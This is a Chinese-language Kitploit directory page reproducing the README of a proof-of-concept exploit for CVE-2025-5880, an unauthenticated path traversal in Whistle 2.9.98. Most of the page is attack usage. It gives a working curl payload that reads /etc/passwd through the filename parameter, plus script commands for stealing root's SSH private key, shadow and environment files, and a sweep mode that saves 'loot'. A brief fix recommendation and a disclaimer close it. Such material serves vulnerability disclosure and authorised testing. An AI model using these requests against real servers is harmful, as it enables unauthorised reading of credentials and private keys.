Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/yacine-rm/cve-2025-5880-poc
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育
GitHubyacine-rm/cve-2025-5880-poc

CVE-2025-5880-PoC

Whistle v2.9.98 中未经身份验证的路径遍历漏洞的概念验证利用程序。

查看仓库
124个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-5880 — Whistle 2.9.98 路径遍历漏洞利用PoC

Python CVE CWE License

Whistle v2.9.98 中未经身份验证的路径遍历漏洞的 PoC 利用脚本。


漏洞概要

字段详情
CVE IDCVE-2025-5880
CWECWE-22(路径遍历)
受影响软件Whistle ≤ 2.9.98
受影响端点/cgi-bin/sessions/get-temp-file
攻击向量网络 —— 无需身份验证
影响可读取主机文件系统上的任意文件

filename 查询参数在使用前未经过滤,直接用于打开磁盘上的文件,攻击者可借此绕过预期的临时文件目录,读取 Whistle 进程有权访问的任何文件(例如 /etc/passwd、/root/.ssh/id_rsa)。


快速开始

root@kitploit:~
# 克隆仓库
git clone https://github.com/YourHandle/CVE-2025-5880
cd CVE-2025-5880
 
# 无需外部依赖
python3 CVE-2025-5880.py -u http://TARGET:8899 --preset passwd

用法

root@kitploit:~
python3 CVE-2025-5880.py [-h] -u URL [-f FILE] [--preset PRESET]
                          [--sweep] [-o OUTPUT] [--save-dir DIR]
                          [--timeout N]

示例

root@kitploit:~
# 读取 /etc/passwd
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset passwd
 
# 获取 root 的 SSH 私钥
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset id_rsa -o id_rsa.pem
 
# 读取任意路径
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 -f /proc/self/environ
 
# 扫描并保存所有预设文件
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --sweep --save-dir ./loot

原始 PoC(curl)

root@kitploit:~
# /etc/passwd
curl -s "http://TARGET:8899/cgi-bin/sessions/get-temp-file?filename=/etc/passwd" | jq -r '.value'

修复建议

将 Whistle 更新到能够验证并限制 filename 参数只能访问预期临时文件目录的版本。服务端应应用白名单路径规范化(例如 path.resolve 加前缀检查)。


免责声明

此工具仅供授权的安全测试及教育目的使用。
对你不拥有或未经明确许可的系统进行未经授权的使用是非法且不道德的。
作者对任何滥用行为不承担任何责任。

下载工具
标志描述
-u / --url目标的基础 URL(例如 http://192.168.1.10:8899)
-f / --file要读取的任意文件路径
--preset命名快捷方式:passwd shadow hosts id_rsa …
--sweep自动遍历所有预设文件
-o / --output将结果保存到文件
--save-dir--sweep 模式下保存战利品的目录
--timeoutHTTP 超时时间(秒,默认 10)